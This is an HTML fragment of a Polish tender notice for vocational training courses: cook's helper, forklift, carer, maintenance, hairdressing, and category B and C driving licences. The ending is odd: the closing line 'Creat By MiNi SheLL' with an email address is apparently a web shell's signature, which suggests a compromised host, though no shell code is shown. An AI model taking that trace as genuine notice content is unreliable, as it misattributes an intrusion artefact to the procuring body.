<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pomocnik kucharza Ilość  osób 1  osoba, Ilość godzin szkolenia minimum 120 godz., w tym:  30 godz. zajęć teoretycznych i  90  godz.  zajęć praktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doswiadczenie i wiedza - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KURS   ZAWODOWY -  Obsługa wózka widłowego (jezdniowego).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obsługa wózka widłowego (jezdniowego), Ilość  osób: 1  osoba,
Ilość godzin szkolenia: minimum 67 godz., w tym  48 godz. zajęć teoretycznych i  19  godz.  zajęć praktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie i wiedza - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KURS  ZAWODOWY - Opiekunka osób starszych i niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opiekunka osób starszych i niepełnosprawnych, Ilość  osób 1  osoba, Ilość godzin szkolenia minimum 80 godz., w tym:  40 godz. zajęć teoretycznych i  40  godz.  zajęć praktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie i wiedza - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> KURS  ZAWODOWY - Konserwator.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwator, Ilość  osób: 1  osoba, Ilość godzin szkolenia: minimum 90 godz., w tym  30 godz. zajęć teoretycznych i  60 godz.  zajęć praktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie i wiedza - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> KURS  ZAWODOWY - Fryzjerka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fryzjerka, Ilość  osób: 2  osoby, Ilość godzin szkolenia: minimum 180 godz., w tym  30 godz. zajęć teoretycznych i  150 godz.  zajęć praktycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie i wiedza - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> KURS  -  Prawa jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prawa jazdy kat. B, Ilość  osób 10  osób, Ilość godzin szkolenia minimum 60 godz., w tym  30 godz. zajęć teoretycznych (grupowych) i  30 godz.  zajęć praktycznych (indywidualnych).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie i wiedza - 60</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> KURS  -  Prawa jazdy kat. C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prawa jazdy kat. C, Ilość  osób: 1 mężczyzna, Ilość godzin szkolenia minimum 50 godz., w tym  20 godz. zajęć teoretycznych i  30 godz.  zajęć praktycznych (indywidualnych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doswiadczenie i wiedza - 60</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com